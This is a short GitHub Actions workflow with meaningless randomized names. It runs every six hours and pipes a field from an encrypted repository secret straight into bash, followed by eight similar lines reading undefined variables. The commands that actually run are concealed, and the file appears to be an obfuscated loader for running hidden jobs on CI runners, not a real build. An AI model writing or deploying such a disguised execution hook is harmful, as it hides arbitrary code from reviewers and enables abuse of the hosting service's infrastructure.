name: suoruchao4376

on:
  workflow_dispatch:
  schedule:
    - cron: '31 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: suoruchao4376
        env:
          z78787: ${{ secrets.z78787 }}
        run: |
          echo $z78787 | jq -r .ir5 | /bin/bash
          echo $c73 | jq -r .p92447 | /bin/bash
          echo $rdyxo73 | jq -r .fwkze0 | /bin/bash
          echo $qt562 | jq -r .ppmke6 | /bin/bash
          echo $rlegd16 | jq -r .jo87 | /bin/bash
          echo $zwpih2 | jq -r .qb31236 | /bin/bash
          echo $wz42426 | jq -r .vdzn7 | /bin/bash
          echo $zjs269 | jq -r .lex3533 | /bin/bash
          echo $n86 | jq -r .ygl0 | /bin/bash

